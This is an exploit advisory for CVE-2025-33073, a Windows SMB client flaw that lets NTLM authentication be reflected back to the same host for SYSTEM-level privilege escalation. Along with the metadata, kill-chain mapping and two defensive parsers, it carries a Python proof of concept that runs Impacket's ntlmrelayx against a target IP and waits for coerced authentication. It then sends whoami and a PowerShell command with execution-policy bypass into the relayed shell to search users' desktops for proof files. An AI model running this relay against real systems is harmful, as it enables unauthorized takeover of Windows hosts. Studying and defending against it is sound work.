| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Improper Access Control in Microsoft | 13 Jun 2025 12:15 | – | githubexploit |
| Exploit for Improper Access Control in Microsoft | 10 Dec 2025 03:46 | – | githubexploit |
| July “In the Trend of VM” (#17): vulnerabilities in Microsoft Windows and Roundcube | 21 Jul 2025 16:30 | – | avleonov |
| About Elevation of Privilege – Windows SMB Client (CVE-2025-33073) vulnerability | 13 Jul 2025 12:26 | – | avleonov |
| June Microsoft Patch Tuesday | 10 Jun 2025 21:49 | – | avleonov |
| CVE-2025-33073 | 10 Jun 2025 13:15 | – | circl |
| Microsoft Windows SMB Client Improper Access Control Vulnerability | 20 Oct 2025 00:00 | – | cisa_kev |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 20 Oct 2025 12:00 | – | cisa |
| Microsoft Windows SMB Server access control error vulnerability | 10 Jun 2025 00:00 | – | cnnvd |
| CVE-2025-33073 | 10 Jun 2025 17:02 | – | cve |
=============================================================================================================================================
| # Title : Windows 11 V 24H2 SMB Local Privilege Escalation via NTLM Local Reflection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214224/ & CVE-2025-33073
[+] Summary : CVE‑2025‑33073 is an elevation‑of‑privilege vulnerability in the Windows SMB client (Microsoft: "Improper Access Control", fixed in the June 2025 security update) that abuses NTLM reflection: an NTLM authentication emitted by the victim host is reflected back to that same host.
It is not an unauthenticated remote entry point, but it breaks key security assumptions in post‑compromise scenarios, especially those involving NTLM authentication and SMB Signing.
In affected Windows versions, an attacker who already has a foothold (an authenticated position on the network, or local code execution) can coerce the victim into authenticating to an attacker‑controlled SMB server in a way the victim treats as a local loopback authentication, so that the victim's NTLM credentials
(for a coerced SYSTEM service, its machine account) are reflected back to the same host, resulting in elevated privileges (up to SYSTEM).
This vulnerability is particularly dangerous because it can undermine the protection normally expected from SMB Signing in this reflected, same‑host context,
making it highly relevant for post‑exploitation, lateral movement preparation, and privilege escalation chains.
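What a reflected authentication looks like at the NTLM level, as an added example that is not part of this advisory or its PoC: the parser below reads an NTLM AUTHENTICATE_MESSAGE (type 3) and flags the case where the account authenticating to a server is that server's own machine account (HOSTNAME$) arriving from a non‑loopback address, which is the shape of the reflection described above. The message is constructed inline as sample input; the host names and addresses (CORP, WS01$, 10.0.0.66) and the function names are assumptions. A host that legitimately connects to itself through its own routable IP matches too, so treat the result as a triage signal to correlate with coercion activity, not as proof of exploitation.

```python
import struct
import ipaddress

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_AUTHENTICATE = 3
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
# signature(8) + type(4) + six 8-byte field descriptors(48) + flags(4) + version(8) + MIC(16)
PAYLOAD_START = 88
FIELD_NAMES = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")
STRING_FIELDS = ("domain", "user", "workstation")


def build_authenticate(domain, user, workstation, nt_response=b"\x00" * 24):
    """Constructed AUTHENTICATE_MESSAGE (unicode strings, zero MIC) used as sample input."""
    blobs = [b"\x00" * 24, nt_response,
             domain.encode("utf-16le"), user.encode("utf-16le"), workstation.encode("utf-16le"), b""]
    descriptors, offset = b"", PAYLOAD_START
    for blob in blobs:
        descriptors += struct.pack("<HHI", len(blob), len(blob), offset)  # Len, MaxLen, BufferOffset
        offset += len(blob)
    flags = NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_VERSION
    version = struct.pack("<BBH3sB", 10, 0, 19041, b"\x00" * 3, 0x0F)  # product 10.0.19041, NTLMSSP rev 15
    return (NTLMSSP_SIGNATURE + struct.pack("<I", NTLM_AUTHENTICATE) + descriptors
            + struct.pack("<I", flags) + version + b"\x00" * 16 + b"".join(blobs))


def parse_authenticate(msg):
    """Parse the fixed header and the six variable-length fields; strings decode per the UNICODE flag."""
    if len(msg) < 64 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    if struct.unpack_from("<I", msg, 8)[0] != NTLM_AUTHENTICATE:
        raise ValueError("not an AUTHENTICATE_MESSAGE (type 3)")
    flags = struct.unpack_from("<I", msg, 60)[0]
    codec = "utf-16le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    parsed = {"flags": flags}
    for i, name in enumerate(FIELD_NAMES):
        length, _max_len, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        if offset + length > len(msg):                  # descriptor pointing outside the message
            raise ValueError(f"field {name} out of bounds")
        raw = msg[offset:offset + length]
        parsed[name] = raw.decode(codec) if name in STRING_FIELDS else raw
    return parsed


def is_reflected_machine_auth(msg, server_hostname, source_ip):
    """True when the authenticating account is the receiving server's own machine account
    (HOSTNAME$) and the connection did not arrive over loopback: the shape of a reflected
    NTLM authentication. A host talking to itself via its own routable IP matches as well."""
    parsed = parse_authenticate(msg)
    own_account = parsed["user"].upper() == server_hostname.split(".")[0].upper() + "$"
    return own_account and not ipaddress.ip_address(source_ip).is_loopback


if __name__ == "__main__":
    sample = build_authenticate("CORP", "WS01$", "WS01")   # constructed: WS01's own machine account
    print(parse_authenticate(sample)["user"],
          is_reflected_machine_auth(sample, "ws01.corp.local", "10.0.0.66"))
```

The check needs to know which host received the authentication, so it belongs on the SMB server side (or in a sensor that tags each flow with the destination host); anonymous sessions carry an empty user name and never match.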
[+] Windows Versions Impacted by CVE‑2025‑33073
The vulnerability affects the client and server editions of Windows listed below when they are unpatched, i.e. running builds earlier than those of Microsoft's June 2025 security update.
Windows 10 Versions (before patch):
Windows 10 Version 1507
Windows 10 Version 1607
Windows 10 Version 1809
Windows 10 Version 21H2
Windows 10 Version 22H2
[+] All with builds earlier than their respective patched builds listed by Microsoft.
Windows 11 Versions (before patch):
Windows 11 Version 22H2
Windows 11 Version 23H2
Windows 11 Version 24H2
[+] Affected until the patched builds released in June 2025.
Windows Server Editions (before patch):
Windows Server 2008 (SP2 & R2 SP1)
Windows Server 2012 & 2012 R2
Windows Server 2016
Windows Server 2019
Windows Server 2022 (multiple branch builds)
Windows Server 2025 (24H2)
[+] All with builds lower than those patched by Microsoft in June 2025.
[+] Vulnerability Type: Elevation of Privilege (Improper Access Control)
[+] Component: Microsoft Windows SMB client
[+] Attack Vector: Network (Microsoft rates it AV:N); the victim's authentication is reflected from the attacker's relay back to the victim, so the effect is same‑host
[+] Authentication Required: Yes (an authenticated position on the network or a foothold on the victim; the coerced authentication itself comes from the victim)
[+] Remote Exploitation : Not as an unauthenticated entry point; the attacker must coerce the victim's NTLM authentication and relay it back
[+] Post‑Exploitation Impact: High
[+] Role in a Professional Kill Chain :
CVE‑2025‑33073 fits after initial access, not as an entry point:
[+] Initial Access :
Phishing, credential theft, NTLM relay, or local code execution
[+] Execution :
Attacker gains user‑level shell or service execution
[+] Privilege Escalation :
CVE‑2025‑33073 leveraged
NTLM Local Reflection enables elevation (SYSTEM context)
[+] Credential Access :
High‑privilege tokens and credentials become accessible
[+] Lateral Movement :
Elevated access enables broader network compromise
[+] Persistence / Impact :
Durable control of the system or domain resources
The vulnerability amplifies existing access rather than creating it.
[+] MITRE ATT&CK Mapping :
- Primary
TA0004 – Privilege Escalation (tactic)
T1068 – Exploitation for Privilege Escalation (technique)
- Secondary / Contextual
TA0006 – Credential Access (tactic)
T1557 – Adversary‑in‑the‑Middle; sub‑technique T1557.001 (LLMNR/NBT‑NS Poisoning and SMB Relay) covers the NTLM relay/reflection step
TA0008 – Lateral Movement (tactic, indirectly enabled)
[+] Relationship to NTLM Relay :
    Aspect                               Relation
    Classic NTLM Relay (cross‑host)      No
    SMB Signing Bypass (Remote)          No
    NTLM Local Reflection                Yes
    Post‑Auth Privilege Escalation       Yes
[+] Key Insight:
CVE‑2025‑33073 does not make a cross‑host NTLM relay possible where it was not; it lets an NTLM authentication be reflected back to the host that produced it, which the SMB anti‑reflection protections introduced with MS08‑068 were meant to prevent, so NTLM‑based protections can be bypassed locally even when SMB Signing is enabled.
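The signing check that matters for relay, as an added example (not the advisory's or Impacket's code): the PoC further down asks Impacket for isSigningRequired(); this standalone parser shows what that answer is derived from, namely the SecurityMode field of the server's SMB2 NEGOTIATE response. Both the response and the all‑zero server GUID are constructed inline, and the function names are assumptions. The caveat it encodes: an SMB2 server always advertises SIGNING_ENABLED, so only SIGNING_REQUIRED protects a server against a classic cross‑host relay, and neither bit tells you whether the host is patched for CVE‑2025‑33073.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001      # set on every server response
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001       # always set by an SMB2 server
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002      # the bit that actually refuses unsigned sessions
HEADER_LEN = 64
NEGOTIATE_RESPONSE_FIXED = 64                 # StructureSize 65 counts one byte of variable buffer


def build_negotiate_response(security_mode, dialect=0x0311):
    """Constructed SMB2 NEGOTIATE response: 64-byte header plus the fixed body, no security blob."""
    header = struct.pack("<4sHHIHHIIQIIQ16s",
                         SMB2_MAGIC, HEADER_LEN, 0, 0,      # ProtocolId, StructureSize, CreditCharge, Status
                         SMB2_NEGOTIATE, 1,                 # Command, CreditResponse
                         SMB2_FLAGS_SERVER_TO_REDIR, 0,     # Flags, NextCommand
                         0, 0, 0, 0, b"\x00" * 16)          # MessageId, Reserved, TreeId, SessionId, Signature
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, security_mode, dialect, 0,       # StructureSize, SecurityMode, DialectRevision, ContextCount
                       b"\x00" * 16,                        # ServerGuid (constructed, all zero)
                       0x7, 0x800000, 0x800000, 0x800000,   # Capabilities, MaxTransact/Read/WriteSize
                       0, 0,                                # SystemTime, ServerStartTime
                       HEADER_LEN + NEGOTIATE_RESPONSE_FIXED, 0, 0)  # SecurityBufferOffset/Length, ContextOffset
    return header + body


def parse_negotiate_signing(resp):
    """Return the dialect and the two signing bits from a server NEGOTIATE response."""
    if len(resp) < HEADER_LEN + NEGOTIATE_RESPONSE_FIXED or resp[:4] != SMB2_MAGIC:
        raise ValueError("not a complete SMB2 message")
    command, = struct.unpack_from("<H", resp, 12)
    flags, = struct.unpack_from("<I", resp, 16)
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", resp, HEADER_LEN)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def relay_exposure(resp):
    """Classify a server for classic cross-host NTLM relay: only 'required' refuses an unsigned session."""
    mode = parse_negotiate_signing(resp)
    if mode["signing_required"]:
        return "required"
    return "enabled-only" if mode["signing_enabled"] else "disabled"


if __name__ == "__main__":
    for sm in (0x0001, 0x0003):     # typical server answers: enabled only, enabled + required
        print(hex(sm), relay_exposure(build_negotiate_response(sm)))
```

Feed the function the raw bytes of the first server reply on port 445 (after the 4‑byte NetBIOS session header) to get the same verdict offline from a capture.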
[+] Security Impact :
Undermines trust in SMB Signing within local contexts
Enables SYSTEM‑level privilege escalation
Increases blast radius of otherwise “contained” compromises
[+] Especially dangerous in:
Red‑team post‑exploitation
Breach escalation scenarios
Incident response cases where the initial foothold was assessed as low‑impact
[+] Final Assessment :
CVE‑2025‑33073 is a force‑multiplier vulnerability.
On its own, it is not an entry vector—but in the hands of an attacker with limited access, it can turn a foothold into full system compromise, making it a critical post‑exploitation risk in modern Windows environments.
[+] Usage : python poc.py
[+] POC :
import os
import re
import sys
import shutil
import signal
import socket
import subprocess
import threading
import time
import logging
from datetime import datetime
from queue import Queue, Empty

# This script only drives ntlmrelayx and waits for the forced NTLM authentication to
# arrive; coercing the victim into authenticating is done outside of it.

logger = logging.getLogger("Orchestrator")
if not logger.handlers:
    logger.setLevel(logging.INFO)

    class SafeFormatter(logging.Formatter):
        """Drop ANSI colour sequences (before the ESC byte is stripped) and non-printable bytes
        so the log file stays clean."""
        def format(self, record):
            msg = re.sub(r'\x1b\[[0-9;]*m', '', super().format(record))
            return "".join(ch for ch in msg if ch.isprintable() or ch in "\n\r\t")

    fh = logging.FileHandler(f"relay_orchestrator_{datetime.now().strftime('%m%d_%H%M%S')}.log")
    fh.setFormatter(SafeFormatter('%(asctime)s [%(levelname)s] %(message)s'))
    logger.addHandler(fh)
    ch = logging.StreamHandler()
    ch.setFormatter(logging.Formatter('%(message)s'))
    logger.addHandler(ch)


def log_info(msg): logger.info(f"\033[0;34m[*] {msg}\033[0m")
def log_success(msg): logger.info(f"\033[0;32m[+] {msg}\033[0m")
def log_err(msg): logger.error(f"\033[0;31m[x] {msg}\033[0m")


def check_smb_signing_native(target_ip):
    """Return True if the target requires SMB signing, False if not, None if it could not be reached."""
    log_info(f"Checking SMB Signing (Native): {target_ip}...")
    try:
        from impacket.smbconnection import SMBConnection
        # The negotiate exchange alone reveals the server's SecurityMode; no login is needed.
        smb = SMBConnection("*", target_ip, sess_port=445, timeout=5)
        is_required = smb.isSigningRequired()
        smb.close()
        return is_required
    except Exception as e:
        log_err(f"SMB Check failed (port closed or host unreachable): {e}")
        return None


def post_exploit_analysis(port):
    """Talk to the interactive shell ntlmrelayx opened on localhost and report the privilege level.
    The commands assume that shell executes cmd.exe command lines on the target."""
    ps_payload = (
        # whoami /user prints the caller's account SID; S-1-5-18 is NT AUTHORITY\SYSTEM
        "$me = whoami /user;"
        "if ($me -match 'S-1-5-18') { 'STATUS: SYSTEM (S-1-5-18)' } else { 'STATUS: NOT SYSTEM' };"
        "Get-ChildItem -Path 'C:\\Users\\*\\Desktop\\*' -Include '*flag*','proof.txt' -File -ErrorAction SilentlyContinue | % { $_.FullName }"
    )
    cmds = f"whoami & hostname\npowershell -NoProfile -ExecutionPolicy Bypass -Command \"{ps_payload}\"\nexit\n"
    try:
        with socket.create_connection(("127.0.0.1", int(port)), timeout=10) as s:
            s.sendall(cmds.encode('utf-8'))
            s.settimeout(3)
            buffer = b""
            try:
                while True:
                    chunk = s.recv(8192)
                    if not chunk:
                        break
                    buffer += chunk
            except socket.timeout:
                pass
            # Output may be UTF-16LE (PowerShell) or UTF-8 (cmd); decide by the presence of NUL bytes.
            try:
                decoded = buffer.decode('utf-16le') if b'\x00' in buffer else buffer.decode('utf-8')
            except UnicodeDecodeError:
                decoded = buffer.decode('utf-8', errors='ignore')
            log_success(f"Session Analysis Results:\n{decoded.strip()}")
    except Exception as e:
        log_err(f"Failed to interact with session on port {port}: {e}")


def cleanup_process(proc):
    """Terminate the ntlmrelayx process tree on Windows and Unix."""
    log_info("Cleaning up active processes...")
    try:
        if os.name == 'nt':
            subprocess.run(['taskkill', '/F', '/T', '/PID', str(proc.pid)], capture_output=True)
        else:
            os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
        proc.wait(timeout=5)
    except Exception:
        proc.kill()


def run_orchestrator(target_ip):
    # ntlmrelayx announces its interactive shell with a line such as
    # "Started interactive SMB client shell via TCP on 127.0.0.1:11000"; capture the port.
    port_regex = re.compile(r"Started interactive .*?(?:127\.0\.0\.1|0\.0\.0\.0):(\d+)", re.I)
    # Run the installed ntlmrelayx.py script; the impacket.examples.ntlmrelayx package is not
    # runnable with "python -m" (it has no __main__).
    relayx = shutil.which("ntlmrelayx.py") or "ntlmrelayx.py"
    # winrms:// is the author's chosen target protocol. It is not among the relay clients of a
    # stock Impacket ntlmrelayx (smb, http(s), ldap(s), mssql, imap(s), smtp, rpc, dcsync), so the
    # installed ntlmrelayx build must provide a WinRM client for this to work.
    relay_cmd = [sys.executable, relayx, "-smb2support", "-t", f"winrms://{target_ip}", "-i"]
    kwargs = {'creationflags': subprocess.CREATE_NEW_PROCESS_GROUP} if os.name == 'nt' else {'preexec_fn': os.setsid}
    try:
        proc = subprocess.Popen(relay_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                                text=True, bufsize=1, **kwargs)
        q = Queue()

        def enqueue_output(out, queue):
            try:
                for line in iter(out.readline, ''):
                    queue.put(line)
            except Exception:
                pass
            finally:
                out.close()

        t = threading.Thread(target=enqueue_output, args=(proc.stdout, q), daemon=True)
        t.start()
        log_info(f"Orchestrator active.. waiting for forced NTLM auth for {target_ip}")
        start_time = time.time()
        while time.time() - start_time < 600:    # give up after ten minutes without a session
            try:
                line = q.get_nowait()
                if any(x in line for x in ["Relaying", "Authenticating", "127.0.0.1"]):
                    print(f"\033[0;34m[RELAY]\033[0m {line.strip()}")
                match = port_regex.search(line)
                if match:
                    found_port = match.group(1)
                    log_success(f"Active session detected! Allocated Port: {found_port}")
                    post_exploit_analysis(found_port)
                    break
            except Empty:
                time.sleep(0.1)
            if proc.poll() is not None:
                break
        cleanup_process(proc)
        t.join(timeout=1)
    except Exception as e:
        log_err(f"Orchestrator management error: {e}")


def main():
    try:
        import impacket  # noqa: F401  (dependency check only)
        print("\033[0;36m--- NTLM Relay Orchestrator (English Edition) ---\033[0m")
        target_ip = input("[>] Target IP: ").strip()
        if not re.match(r"^\d{1,3}(\.\d{1,3}){3}$", target_ip):
            log_err("Invalid IP format.")
            return
        signing_req = check_smb_signing_native(target_ip)
        if signing_req is True:
            log_err("SMB Signing is REQUIRED; a classic relay will fail (unless CVE-2025-33073 Local Reflection occurs).")
            if input("[!] Do you want to proceed anyway? (y/n): ").lower() != 'y':
                return
        elif signing_req is False:
            log_success("SMB Signing is NOT REQUIRED. Target is vulnerable to Relay.")
        run_orchestrator(target_ip)
    except KeyboardInterrupt:
        print("\n[*] Script aborted by user.")
        sys.exit(0)
    except ImportError:
        log_err("Impacket library missing. Install it via: pip install impacket")


if __name__ == "__main__":
    main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================